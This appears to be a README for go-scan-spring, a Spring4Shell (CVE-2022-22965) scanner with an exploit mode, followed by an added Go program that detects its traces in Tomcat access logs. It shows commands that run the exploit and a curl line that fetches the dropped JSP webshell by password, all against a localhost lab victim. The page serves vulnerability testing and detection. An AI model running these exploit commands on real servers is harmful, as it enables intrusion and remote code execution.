For more information: https://www.fracturelabs.com/posts/effective-spring4shell-scanning-exploitation/
[~/opt] $ git clone https://github.com/fracturelabs/go-scan-spring.git
[~/opt] $ cd go-scan-spring
[~/opt/go-scan-spring] $ go run main.go help scan
Run a scan against target URLs looking for vulnerable services

Usage:
  go-scan-spring scan [flags]

Flags:
  -f, --file string          Target URL filename (- for stdin)
      --follow-redirect      Follow redirects
  -h, --help                 help for scan
      --http-get             Test using HTTP GET requests (must set =false to disable) (default true)
      --http-post            Test using HTTP POST requests (must set =false to disable) (default true)
      --identifier string    Unique scan identifier (used as a password and an exploit filename) (default "go-scan-spring")
  -x, --proxy string         Upstream proxy
      --run-baseline         Run a baseline test to see if endpoint is up
      --run-exploit          Run an exploit to retrieve the owner of the Tomcat process
      --run-safe             Run a safe test to see if endpoint is vulnerable
  -s, --sleep int            Time to sleep between exploit steps. This is needed to allow time for deployment. (default 10)
  -t, --threads int          Number of threads (default 5)

Global Flags:
      --debug   enable debug logging
[~/opt/go-scan-spring] $ go run main.go scan --run-safe -f urls.txt
Use your own unique --identifier value! It is used as both the password and the exploit filename, so do not run with the default.
# Using HTTP GETs and POSTs
[~/opt/go-scan-spring] $ echo http://localhost:8080/spring4shell_victim/vulnerable | go run main.go scan -f - --identifier 550bafe0-0c6c-4f3e-a46b-0901c28e690b --run-exploit
# Using only HTTP GETs
[~/opt/go-scan-spring] $ echo http://localhost:8080/spring4shell_victim/vulnerable | go run main.go scan -f - --identifier 550bafe0-0c6c-4f3e-a46b-0901c28e690b --run-exploit --http-post=false
# Using only HTTP POSTs
[~/opt/go-scan-spring] $ echo http://localhost:8080/spring4shell_victim/vulnerable | go run main.go scan -f - --identifier 550bafe0-0c6c-4f3e-a46b-0901c28e690b --run-exploit --http-get=false
You can verify the scanner works properly by testing it against an intentionally vulnerable system, such as spring4shell_victim. After a successful exploit run, the dropped file can be fetched with the identifier as the password:
[~] $ curl --output - 'http://localhost:8080/go-scan-spring/550bafe0-0c6c-4f3e-a46b-0901c28e690b-AD.jsp?pwd=550bafe0-0c6c-4f3e-a46b-0901c28e690b'
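The commands above leave traces a defender can look for. The following Go program is an added example, not part of go-scan-spring: it reads a constructed Tomcat/Apache combined-format access log and flags two things, requests to the exploit artifact path this page shows (`/go-scan-spring/<identifier>-AD.jsp?pwd=<identifier>`, with the default identifier `go-scan-spring` covered by the same pattern) and query strings that bind `class.module.classLoader.*`, which is the publicly documented CVE-2022-22965 property path and is not something the page itself prints. The log format, the sample lines and the function names are assumptions.

```go
package main

import (
	"bufio"
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding is one suspicious access-log entry.
type Finding struct {
	Line   int    // 1-based line number in the log
	Reason string // why it was flagged
	Target string // the request target as logged
}

// artifactRe matches the path of the JSP that the --run-exploit step drops,
// as shown on this page: /go-scan-spring/<identifier>-AD.jsp
var artifactRe = regexp.MustCompile(`^/go-scan-spring/([^/?]+)-AD\.jsp$`)

// bindingPrefix is the property path CVE-2022-22965 payloads bind through
// (a public indicator, compared case-insensitively; not taken from this page).
const bindingPrefix = "class.module.classloader"

// requestTarget returns the method and target from a combined-format log
// line, i.e. the quoted "METHOD /target HTTP/x.y" field. Assumption: the
// log uses that format; other formats need their own field extraction.
func requestTarget(line string) (method, target string, ok bool) {
	open := strings.Index(line, `"`)
	if open < 0 {
		return "", "", false
	}
	rest := line[open+1:]
	end := strings.Index(rest, `"`)
	if end < 0 {
		return "", "", false
	}
	fields := strings.Fields(rest[:end])
	if len(fields) < 2 {
		return "", "", false
	}
	return fields[0], fields[1], true
}

// Classify decides whether one log line looks like go-scan-spring or
// Spring4Shell activity. It returns an empty reason for benign lines.
func Classify(line string) (string, string) {
	method, target, ok := requestTarget(line)
	if !ok {
		return "", ""
	}
	u, err := url.Parse(target)
	if err != nil {
		return "", target
	}
	// Decode percent-encoding so class%2Emodule%2EclassLoader is caught too.
	decoded, err := url.QueryUnescape(u.RawQuery)
	if err != nil {
		decoded = u.RawQuery
	}
	if strings.Contains(strings.ToLower(decoded), bindingPrefix) {
		return method + " request binding class.module.classLoader.* (CVE-2022-22965 indicator)", target
	}
	if m := artifactRe.FindStringSubmatch(u.Path); m != nil {
		id := m[1]
		if u.Query().Get("pwd") == id {
			return "go-scan-spring exploit artifact accessed with identifier " + id, target
		}
		return "go-scan-spring exploit artifact path requested", target
	}
	return "", target
}

// ScanAccessLog runs Classify over every line and collects the findings.
func ScanAccessLog(logText string) []Finding {
	var findings []Finding
	sc := bufio.NewScanner(strings.NewReader(logText))
	for n := 1; sc.Scan(); n++ {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		if reason, target := Classify(line); reason != "" {
			findings = append(findings, Finding{Line: n, Reason: reason, Target: target})
		}
	}
	return findings
}

// SampleLog is a constructed combined-format excerpt, not real traffic.
// Line 3 is a bodied POST: its parameters never reach the access log.
const SampleLog = `127.0.0.1 - - [31/Mar/2022:12:00:01 +0000] "GET /spring4shell_victim/vulnerable?name=alice HTTP/1.1" 200 42
127.0.0.1 - - [31/Mar/2022:12:00:02 +0000] "GET /spring4shell_victim/vulnerable?class.module.classLoader.example=probe HTTP/1.1" 200 42
127.0.0.1 - - [31/Mar/2022:12:00:03 +0000] "POST /spring4shell_victim/vulnerable HTTP/1.1" 200 42
127.0.0.1 - - [31/Mar/2022:12:00:04 +0000] "GET /spring4shell_victim/vulnerable?class%2Emodule%2EclassLoader.example=probe HTTP/1.1" 200 42
127.0.0.1 - - [31/Mar/2022:12:00:15 +0000] "GET /go-scan-spring/550bafe0-0c6c-4f3e-a46b-0901c28e690b-AD.jsp?pwd=550bafe0-0c6c-4f3e-a46b-0901c28e690b HTTP/1.1" 200 17
127.0.0.1 - - [31/Mar/2022:12:00:16 +0000] "GET /go-scan-spring/go-scan-spring-AD.jsp?pwd=wrong HTTP/1.1" 404 0
`

func main() {
	for _, f := range ScanAccessLog(SampleLog) {
		fmt.Printf("line %d: %s\n  %s\n", f.Line, f.Reason, f.Target)
	}
}
```

Two points the sample makes: the `--http-post` mode of the scanner carries its parameters in the request body, which access logs do not record, so the query-string check alone misses it; the dropped JSP path, however, is requested by GET with the identifier in the query and is the more durable indicator, whether the fetch succeeded (200) or the file was never written (404).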
- The entire structure and several functions were borrowed heavily from the wonderful GoWitness project from SensePost.
- The safe check implemented in this was inspired by The Randori Attack Team and Zach Grace
- Whoever created the first PoC - stuff is moving too fast to properly attribute this right now!